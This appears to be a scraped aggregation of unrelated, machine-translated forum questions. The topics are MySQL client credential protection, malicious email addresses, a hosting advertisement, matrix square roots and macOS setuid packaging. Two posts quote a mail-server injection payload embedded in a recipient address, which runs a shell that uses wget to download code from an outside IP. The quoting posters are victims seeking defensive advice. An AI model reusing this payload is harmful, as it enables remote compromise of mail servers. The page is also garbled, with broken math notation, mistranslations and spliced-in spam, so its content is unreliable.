Security – How do I back up my queried data from my local MySQL server to a remote root computer unprotected entities?

I've installed a remote client computer in a server center owned by an entity that must also have the root directory of the client computer, as required by industry regulations. The client computer runs a C ++ program that is used libmysqlclient.so and regularly polls a MySQL server in my office over the Internet.

The data is very sensitive, so I need to protect the data from being distributed throughout the data transfer process. No one is familiar with the server center, not even its owner, who has the root of the client machine.

First the json The format database configuration of the C ++ program includes explicit IP address, port, user, and password. Any user with root privileges can read and use them to connect to our server from the client computer. Since IP and port must be reported to the owner of the server center that manages the intranet, gateway, and firewall as required, I replace the user and password with encrypted strings in the configuration, and the C ++ program decrypts them Start to get the real user and password for connecting to the server.

However, the root user can replace it libmysqlclient.so in the system with a changed version, so that the user and password are printed when the connection is established. Then I change the C ++ program to static linking libmysqlclient.a at compile time.

However, the transmitted data is still plain text. So I activate SSL on the MySQL server and change the user as SSL REQUIRE, Then a man-in-the-middle attack should not be easy.

For SSL to work, the client computer must also contain files with ca, client-cert, and client-key. I'm wondering if the owner of the server center can capture the transmitted encrypted traffic and use those files to decrypt the data without knowing the username and password of the database.

Is there any obvious vulnerability on the client side after all these settings? Suppose that the network structure and the use of MySQL should not be changed.

E-mail exploit attempt intercepted – information requested – email to root + $ {…} @ host

I have received an e-mail to the address below, which is an obvious exploit attempt. Does anyone have details about the particular exploit, so I can make sure I'm patched / not exposed:

root+${run{x2fbinx2fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@mymailserver.example.com

IH managed dedicated server | Root access | UK / USA | SSD storage | 1 Gbps burst | Anti DDos Pro

Infused hosting
https://infused-hosting.com

Web hosting, reseller hosting, virtual servers, domain names

Why choose us?

> Premium ticket support around the clock
> No contracts
> Managed servers
> 99.9% availability guarantee
> Full root access
> Guaranteed bandwidth
> Fast deployment
> Anti-DDOS protection

Here are our two popular Managed Dedicated Server offerings.

DS – UK Starter

Intel Xeon D-1520 – 4c / 8t – 2.2 GHz / 2.6 GHz
32 GB DDR4 ECC 2133 MHz
250 Mbps bandwidth (burst 1 Gbps) unlimited
softRAID 2 x 2 TB (included) Or SSD of your choice
Great Britain (London)
Anti DDoS Pro – Included
1 Free IPv4
root access
Delivery time up to 72 hours

Price from £ 92.99

[[[[Order now]

DS – US Starter

Intel E3-1220LV2
Dual core CPU
2 x 2.30 Ghz
4 GB RAM
1000 GB hard drive in RAID 1
5 TB bandwidth
2 free IPs
Full root access
Server location USA

Prices from £ 92.99 GBP

[[[[Order now]

Contact our sales team for more information.

– Infused Hosting

Matrices – square root of a diagonalizable matrix

Square root of a diagonalizable matrix $ A $ can be obtained as
$$ B = sqrt {A} = D lambda D ^ {- 1} ~~~~ (1), $$ from where $$ lambda = begin {pmatrix} lambda_1 ^ {1/2} & 0 \ 0 & lambda_2 ^ {1/2} end {pmatrix}. $$ Here, $ lambda_ {1,2} $ are the eigenvalues ​​and $ D $ is the diagonalizing matrix or the like $ A $, Recently in a question:

Solving a matrix equation from four unknowns

Square root of $$ P = begin {pmatrix} 4 & 5 \ 3 & 6 end {pmatrix}, $$ was so requested that $ P = Q ^ 2 $, The eigenvalues ​​of $ P $ are $ 9.1, the method (1) and also the command `MatrixPower[P, 1/2]& # 39; from Mathematica
$$ Q = frac {1} {4} begin {pmatrix} 7 & 5 \ 3 & 9 end {pmatrix}. ~~~~ (2) $$
However, a brute-force construction $ Q $ of four unknowns $ a, b, c, d $ and solutions of the equations so along with the conditions that $ Trace (P) = Trace (Q ^ 2) $ and $ det (P) = det (Q ^ 2) $ gives a matrix
$$ Q = frac {1} {2} begin {pmatrix} 1 & 5 \ 3 & 3 end {pmatrix}. ~~~~ (3) $$
Can one explain why the method in (1) and the Mathematica igonres (3)? How can this be fixed?

usb – How do I create an installable app with the root setuid bit set?

I've inherited a codebase that needs updating, but I do not have the build scripts that created the final pkg file.

The code must access a connected USB device (which is treated as a drive) to read and write bits. Therefore, extended permissions are required. Due to the non-technical nature of the end users, they need to be able to click on the app and are not expected to run it from the sudo command line.

The current installer is installed at /Applications/myapp.app, where myapp.app/Contents/MacOS/myapp is set to -rwsr-xr-x root: staff permissions. After installation, this app runs flawlessly and without complaint.

I created a similar pkg file with pkgbuild and created a similar folder in / Applications with the same permissions: newapp.app/Contents/MacOS/newapp -rwsr-xr-x root: staff. However, when I try to run the app without sudo, I get the message "The application with the bundle ID newapp executes setugid (), which is not allowed."

My Mac runs Macos 10.13.6
The app is Python, which has been packed into a binary file.

How should I pack this code so that it runs as root after installation?

Strange root command for frozen e-mail

Hello, Today I found 5 randomly generated emails (the first part was random, the domain was the same and it belongs to one of our clients). E-mail address, I deleted it, but then I saw an e-mail with this address as sender address:

root + $ {run { x2Fbin x2Fsh t-c x22wget x2064.50.180.45 x2ftmp x2f000.000.00.000 x22}} @ server.my.net

the 000.000.00.000 correspond to our server IP and the server.my.net to our server hostname,

The emails were the typical phishing spam e-mails.

should I be worried?

I ran rkhunter with only warnings that I saw on google were normal, even chkrootkit without any hit.

Thanks for your help.